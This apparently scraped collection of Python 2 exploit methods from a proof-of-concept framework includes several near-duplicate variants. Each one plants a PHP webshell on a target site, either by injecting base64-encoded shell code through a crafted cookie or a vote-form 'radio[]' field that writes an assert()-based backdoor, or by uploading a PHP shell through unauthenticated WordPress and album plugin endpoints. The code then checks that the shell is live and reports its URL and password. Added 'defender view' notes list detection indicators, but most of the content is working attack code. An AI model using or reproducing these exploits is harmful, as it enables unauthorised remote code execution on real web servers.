def exploit(cls, args):
        """Deliver the PhpShell payload in a request cookie and report the outcome.

        Reads the target base URL from ``args['options']['target']``, fills the
        ``shutdown_functions[0][arguments][]`` cookie with the base64-encoded
        shell source, sends a single GET carrying those cookies, and then calls
        ``php.check`` on ``<target>/inc/class_tester.php``.

        Returns ``args`` with ``args['success']`` set. On success
        ``args['poc_ret']`` also holds the target URL, the shell URL and the
        value of ``php.get_pwd()``.

        Defender view: the request is recognisable by a cookie whose name
        starts with ``shutdown_functions[`` and carries a base64 blob, followed
        by a request for ``/inc/class_tester.php``.
        """
        vul_url = args['options']['target']
        shell_url = vul_url + '/inc/class_tester.php'
        php = PhpShell()
        # Fill the placeholder in the cookie template with the base64 of the
        # shell source; the formatted string overwrites the entry in cls.cookies.
        cls.cookies['shutdown_functions[0][arguments][]'] = \
            cls.cookies['shutdown_functions[0][arguments][]'].format(b64encode(php.get_content()))
        if args['options']['verbose']:
            # Verbose mode writes the full payload cookie to stdout, so the
            # encoded shell source ends up in any captured console log.
            print '[*] Request URL: ' + vul_url
            print '[*] Payload Content: ' + cls.cookies['shutdown_functions[0][arguments][]']
        # NOTE(review): no timeout is passed and the response is discarded;
        # the outcome is judged only by the follow-up check below.
        requests.get(vul_url, cookies=cls.cookies)

        # presumably php.check probes shell_url for the deployed shell -- confirm in PhpShell
        if php.check(shell_url):
            args['success'] = True
            args['poc_ret']['vul_url'] = vul_url
            args['poc_ret']['Webshell'] = shell_url
            args['poc_ret']['Webshell_PWD'] = php.get_pwd()
            # NOTE(review): nothing in this function removes the file again;
            # unless cleanup happens elsewhere it stays on the tested host.
            return args
        else:
            args['success'] = False
            return args
    def exploit(cls, args):
        """Send the PhpShell payload via a cookie, then check for the shell file.

        The target base URL comes from ``args['options']['target']``. The
        ``shutdown_functions[0][arguments][]`` cookie is filled with the
        base64-encoded shell source and sent in one GET request; afterwards
        ``php.check`` is called on ``<target>/inc/class_tester.php``.

        Returns ``args``; ``args['success']`` is True or False, and on success
        ``args['poc_ret']`` receives ``vul_url``, ``Webshell`` and
        ``Webshell_PWD``.

        Defender view: look for a ``shutdown_functions[...]`` cookie carrying
        base64 data and for requests to ``/inc/class_tester.php``.
        """
        vul_url = args['options']['target']
        shell_url = vul_url + '/inc/class_tester.php'
        php = PhpShell()
        # The cookie template entry is replaced in place by its formatted
        # form (placeholder filled with base64 of the shell source).
        cls.cookies['shutdown_functions[0][arguments][]'] = \
            cls.cookies['shutdown_functions[0][arguments][]'].format(b64encode(php.get_content()))
        if args['options']['verbose']:
            # The payload cookie, including the encoded shell source, is
            # printed to stdout here.
            print '[*] Request URL: ' + vul_url
            print '[*] Payload Content: ' + cls.cookies['shutdown_functions[0][arguments][]']
        # NOTE(review): called without a timeout; the response is not inspected.
        requests.get(vul_url, cookies=cls.cookies)

        # presumably php.check requests shell_url and looks for the shell -- confirm in PhpShell
        if php.check(shell_url):
            args['success'] = True
            args['poc_ret']['vul_url'] = vul_url
            args['poc_ret']['Webshell'] = shell_url
            args['poc_ret']['Webshell_PWD'] = php.get_pwd()
            # NOTE(review): the deployed file is not removed by this function.
            return args
        else:
            args['success'] = False
            return args
示例#3
    def exploit(cls, args):
        """Try each vote subject id until a shell file is confirmed on the target.

        The PhpShell content is replaced with a template that prints
        ``md5(123)`` and passes a request parameter to ``assert``. For every id
        returned by ``cls.get_vote_links(args)`` the method POSTs a crafted
        ``radio[]`` value to the vote ``post`` action, requests the vote
        ``result`` action, and calls ``php.check`` on ``<target>/readme.php``.

        Returns ``args``. ``args['success']`` is True as soon as one id is
        confirmed (with ``vul_url``, ``Webshell`` and ``Webshell_PWD`` stored in
        ``args['poc_ret']``), otherwise False.

        Defender view: the traffic is a POST to ``index.php?m=vote&c=index&a=post``
        whose ``radio[]`` field contains ``fputs(fopen(base64_decode(``, a GET
        to the matching ``a=result`` URL, and a new ``readme.php`` in the web
        root whose output contains 202cb962ac59075b964b07152d234b70, the MD5
        digest of "123".
        """
        vul_url = args['options']['target']
        php = PhpShell()
        # Reaches into a private attribute to swap the shell template; {0} is
        # presumably filled with the password by PhpShell -- confirm.
        php._content = '<?php var_dump(md5(123));@assert($_REQUEST[{0}]);'
        # You can set your own password with these two following ways:
        # pwd = 'your_pwd'
        # php.set_pwd(pwd)
        # for more instructions, check these files in utils/payload/webshell
        ids = cls.get_vote_links(args)
        if ids:
            for i in ids:
                vul_path = '/index.php?m=vote&c=index&a=post&subjectid=%s&siteid=1' % str(i)
                exploit_url = vul_url + vul_path
                if args['options']['verbose']:
                    print '[*] Request URL: ' + exploit_url
                # cmVhZG1lLnBocA is base64 for "readme.php" with the padding
                # stripped, matching shell_url below. The shell source is
                # base64-encoded with '=' removed as well. The payload ends in
                # a raw \x80 byte; its purpose is not visible in this block.
                payload = {
                    'subjectid': i,
                    'radio[]': ');fputs(fopen(base64_decode(cmVhZG1lLnBocA),w),'
                               'base64_decode(%s));\x80' % b64.b64encode(php.get_content()).replace('=', '')
                }

                # NOTE(review): neither request sets a timeout and both
                # responses are discarded.
                requests.post(exploit_url, data=payload)
                v_path = '/index.php?m=vote&c=index&a=result&subjectid=%s&siteid=1' % str(i)
                requests.get(vul_url + v_path)
                shell_url = vul_url + '/readme.php'

                if php.check(shell_url):
                    args['success'] = True
                    args['poc_ret']['vul_url'] = vul_url
                    args['poc_ret']['Webshell'] = shell_url
                    args['poc_ret']['Webshell_PWD'] = php.get_pwd()
                    # NOTE(review): the written file is not removed here.
                    return args
                else:
                    # Not confirmed for this id; the loop moves on to the next one.
                    args['success'] = False
        else:
            # No vote ids were found, so nothing is sent.
            args['success'] = False

        return args
示例#4
    def exploit(cls, args):
        """Iterate over vote subject ids and stop at the first confirmed shell.

        Sets the PhpShell template to one that prints ``md5(123)`` and hands a
        request parameter to ``assert``. Each id from
        ``cls.get_vote_links(args)`` gets a POST to the vote ``post`` action
        with a crafted ``radio[]`` field, a GET to the vote ``result`` action,
        and a ``php.check`` call on ``<target>/readme.php``.

        Returns ``args`` with ``args["success"]`` set; on success
        ``args["poc_ret"]`` holds ``vul_url``, ``Webshell`` and
        ``Webshell_PWD``.

        Defender view: watch for ``radio[]`` form values containing
        ``fputs(fopen(base64_decode(`` on ``m=vote&c=index&a=post``, and for a
        ``readme.php`` in the web root that returns
        202cb962ac59075b964b07152d234b70 (MD5 of "123").
        """
        vul_url = args["options"]["target"]
        php = PhpShell()
        # Private attribute overridden directly; {0} is presumably the
        # password slot filled in by PhpShell -- confirm.
        php._content = "<?php var_dump(md5(123));@assert($_REQUEST[{0}]);"
        # You can set your own password with these two following ways:
        # pwd = 'your_pwd'
        # php.set_pwd(pwd)
        # for more instructions, check these files in utils/payload/webshell
        ids = cls.get_vote_links(args)
        if ids:
            for i in ids:
                vul_path = "/index.php?m=vote&c=index&a=post&subjectid=%s&siteid=1" % str(i)
                exploit_url = vul_url + vul_path
                if args["options"]["verbose"]:
                    print "[*] Request URL: " + exploit_url
                # cmVhZG1lLnBocA decodes to "readme.php" (padding stripped);
                # the shell source is sent base64-encoded with '=' removed.
                # The trailing \x80 byte is part of the original payload; its
                # purpose is not visible in this block.
                payload = {
                    "subjectid": i,
                    "radio[]": ");fputs(fopen(base64_decode(cmVhZG1lLnBocA),w),"
                    "base64_decode(%s));\x80" % b64.b64encode(php.get_content()).replace("=", ""),
                }

                # NOTE(review): no timeouts; responses are ignored.
                requests.post(exploit_url, data=payload)
                v_path = "/index.php?m=vote&c=index&a=result&subjectid=%s&siteid=1" % str(i)
                requests.get(vul_url + v_path)
                shell_url = vul_url + "/readme.php"

                if php.check(shell_url):
                    args["success"] = True
                    args["poc_ret"]["vul_url"] = vul_url
                    args["poc_ret"]["Webshell"] = shell_url
                    args["poc_ret"]["Webshell_PWD"] = php.get_pwd()
                    # NOTE(review): no cleanup of the written file happens here.
                    return args
                else:
                    # This id did not work; continue with the remaining ids.
                    args["success"] = False
        else:
            # get_vote_links returned nothing usable.
            args["success"] = False

        return args
示例#5
    def exploit(cls, args):
        """Send the PhpShell payload in a cookie and record the shell if it responds.

        Uses ``args['options']['target']`` as the base URL, fills the
        ``shutdown_functions[0][arguments][]`` cookie with the base64-encoded
        shell source, issues one GET with those cookies, and calls
        ``php.check`` on ``<target>/inc/class_tester.php``.

        Returns ``args``. On success ``args['success']`` is set to True and
        ``args['poc_ret']`` receives ``vul_url``, ``Webshell`` and
        ``Webshell_PWD``; on failure ``args`` is returned as it was passed in
        (``success`` is not written).

        Defender view: a cookie named ``shutdown_functions[0][arguments][]``
        carrying base64 data, followed by a request to
        ``/inc/class_tester.php``, is the visible footprint of this call.
        """
        vul_url = args['options']['target']
        shell_url = vul_url + '/inc/class_tester.php'
        php = PhpShell()
        # You can set your own password with these two following ways:
        # pwd = 'your_pwd'
        # php = PhpShell(pwd=pwd)
        # or
        # php.set_pwd(pwd)
        # for more instructions, check these files in utils/payload/webshell
        # The cookie template entry is overwritten with its formatted form.
        cls.cookies['shutdown_functions[0][arguments][]'] = \
            cls.cookies['shutdown_functions[0][arguments][]'].format(b64encode(php.get_content()))
        if args['options']['verbose']:
            # Prints the complete payload cookie (encoded shell source) to stdout.
            print '[*] Request URL: ' + vul_url
            print '[*] Payload Content: ' + cls.cookies['shutdown_functions[0][arguments][]']
        # NOTE(review): no timeout; the response itself is not examined.
        requests.get(vul_url, cookies=cls.cookies)

        # presumably php.check probes shell_url for the shell -- confirm in PhpShell
        if php.check(shell_url):
            args['success'] = True
            args['poc_ret']['vul_url'] = vul_url
            args['poc_ret']['Webshell'] = shell_url
            args['poc_ret']['Webshell_PWD'] = php.get_pwd()  # or your own pwd if you've set it manually
            # NOTE(review): the deployed file is left in place by this function.
        return args
示例#6
 def exploit(cls, args):
     """Upload a PHP shell through the plugin's bundled upload handler and verify it.

     Builds the handler URL under
     ``/wordpress/wp-content/plugins/work-the-flow-file-upload/`` from
     ``args['options']['target']``, POSTs the shell as a multipart file named
     ``info.php``, then GETs ``.../server/php/files/info.php`` and looks for
     the marker digest in the response body.

     Returns ``args``. On a match ``args['success']`` is True and
     ``args['poc_ret']`` gets ``webshell`` and ``password``; otherwise ``args``
     is returned without ``success`` being written.

     Defender view: unauthenticated POSTs to
     ``jQuery-File-Upload-9.5.0/server/php/index.php`` and any ``.php`` file
     under its ``files/`` directory are the artefacts to alert on.
     """
     url = args['options']['target']
     vul_url = '%s/wordpress/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php' % url
     # NOTE(review): the shell password is a hard-coded literal, identical for
     # every target this runs against.
     php = PhpShell(pwd='sh4dow').get_content()
     if args['options']['verbose']:
         # The full shell source, password included, is printed to stdout.
         print '[*] Request url:' + vul_url
         print '[*] Upload file:' + php
     payload = {
         'files': ('info.php', php, 'application/octet-stream'),
         'action': 'upload'
     }
     # NOTE(review): no timeout; the upload response is not inspected.
     requests.post(vul_url, files=payload)
     file_path = '%s/wordpress/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/files/info.php' % url
     if args['options']['verbose']:
         print '[*] checking......'
     r = requests.get(file_path)
     # 202cb962ac59075b964b07152d234b70 is the MD5 digest of "123";
     # presumably the PhpShell content prints it as a marker -- confirm.
     if '202cb962ac59075b964b07152d234b70' in r.content:
         args['success'] = True
         args['poc_ret']['webshell'] = file_path
         # The reported password is the literal '******', not the pwd passed
         # to PhpShell above.
         args['poc_ret']['password'] = '******'
         # NOTE(review): the uploaded file is not removed by this function.
     return args
示例#7
 def exploit(cls, args):
     """Upload a PHP shell through the album plugin endpoint and verify it.

     POSTs the shell as the ``Filedata`` multipart field to
     ``/content/plugins/kl_album/kl_album_ajax_do.php`` under
     ``args['options']['target']``, extracts the stored ``/content...php``
     path from the response with a regex, requests that path, and looks for
     the marker digest in the body.

     Returns ``args``. On a match ``args['success']`` is True and
     ``args['poc_ret']`` gets ``webshell`` and ``password``; in every other
     case ``args`` comes back without ``success`` being written.

     Defender view: uploads to ``kl_album_ajax_do.php`` whose stored name ends
     in ``.php``, and responses containing 202cb962ac59075b964b07152d234b70,
     are the artefacts to alert on.
     """
     url = args['options']['target']
     verify_url = '%s/content/plugins/kl_album/kl_album_ajax_do.php' % url
     # NOTE(review): hard-coded shell password, the same for every target.
     php = PhpShell(pwd='bb2').get_content()
     if args['options']['verbose']:
         # The complete shell source, password included, goes to stdout.
         print '[*] Request URL: ' + verify_url
         print '[*] Upload Shell: ' + php
     # The upload file name and the album value are fixed literals.
     verify_file = {'Filedata': ('v%27.php', php), 'album': (None, '11111')}
     # NOTE(review): no timeout on the request.
     content = requests.post(verify_url, files=verify_file).content
     try:
         # Take the stored path from the upload response. re.search returns
         # None when nothing matches, so .group raises in that case.
         file_path = re.search("..(/content.*?\.php)", content).group(1)
     except:
         # Bare except: any error at all, not only "no match", ends the
         # attempt silently and returns args untouched.
         return args
     # check
     if args['options']['verbose']:
         print '[*] Checking...'
     check_content = requests.post(url + file_path).content
     # 202cb962ac59075b964b07152d234b70 is the MD5 digest of "123";
     # presumably the PhpShell content prints it as a marker -- confirm.
     if '202cb962ac59075b964b07152d234b70' in check_content:
         args['success'] = True
         args['poc_ret']['webshell'] = url + file_path
         # The reported password is the literal '******', not the pwd passed
         # to PhpShell above.
         args['poc_ret']['password'] = '******'
         # NOTE(review): the uploaded file is not removed by this function.
     return args
示例#8
    def exploit(cls, args):
        """Walk the vote subject ids and return on the first confirmed shell.

        Replaces the PhpShell template with one that prints ``md5(123)`` and
        feeds a request parameter to ``assert``. For each id from
        ``cls.get_vote_links(args)`` it POSTs a crafted ``radio[]`` value to
        the vote ``post`` action, GETs the vote ``result`` action, and calls
        ``php.check`` on ``<target>/readme.php``.

        Returns ``args`` with ``args['success']`` set; a confirmed shell also
        fills ``vul_url``, ``Webshell`` and ``Webshell_PWD`` in
        ``args['poc_ret']``.

        Defender view: the indicators are ``radio[]`` values containing
        ``fputs(fopen(base64_decode(`` sent to ``m=vote&c=index&a=post``, and a
        ``readme.php`` in the web root whose output contains
        202cb962ac59075b964b07152d234b70 (MD5 of "123").
        """
        vul_url = args['options']['target']
        php = PhpShell()
        # Private attribute set directly; {0} is presumably the password slot
        # that PhpShell fills in -- confirm.
        php._content = '<?php var_dump(md5(123));@assert($_REQUEST[{0}]);'
        # You can set your own password with these two following ways:
        # pwd = 'your_pwd'
        # php.set_pwd(pwd)
        # for more instructions, check these files in utils/payload/webshell
        ids = cls.get_vote_links(args)
        if ids:
            for i in ids:
                vul_path = '/index.php?m=vote&c=index&a=post&subjectid=%s&siteid=1' % str(
                    i)
                exploit_url = vul_url + vul_path
                if args['options']['verbose']:
                    print '[*] Request URL: ' + exploit_url
                # cmVhZG1lLnBocA is base64 for "readme.php" without padding,
                # which is why shell_url below points at /readme.php. The
                # shell source is base64-encoded with '=' stripped. The
                # payload ends in a raw \x80 byte whose purpose is not visible
                # in this block.
                payload = {
                    'subjectid':
                    i,
                    'radio[]':
                    ');fputs(fopen(base64_decode(cmVhZG1lLnBocA),w),'
                    'base64_decode(%s));\x80' %
                    b64.b64encode(php.get_content()).replace('=', '')
                }

                # NOTE(review): both requests run without a timeout and their
                # responses are discarded.
                requests.post(exploit_url, data=payload)
                v_path = '/index.php?m=vote&c=index&a=result&subjectid=%s&siteid=1' % str(
                    i)
                requests.get(vul_url + v_path)
                shell_url = vul_url + '/readme.php'

                if php.check(shell_url):
                    args['success'] = True
                    args['poc_ret']['vul_url'] = vul_url
                    args['poc_ret']['Webshell'] = shell_url
                    args['poc_ret']['Webshell_PWD'] = php.get_pwd()
                    # NOTE(review): the written file is left on the host.
                    return args
                else:
                    # Not confirmed for this id; try the next one.
                    args['success'] = False
        else:
            # No vote ids available, so no request is made.
            args['success'] = False

        return args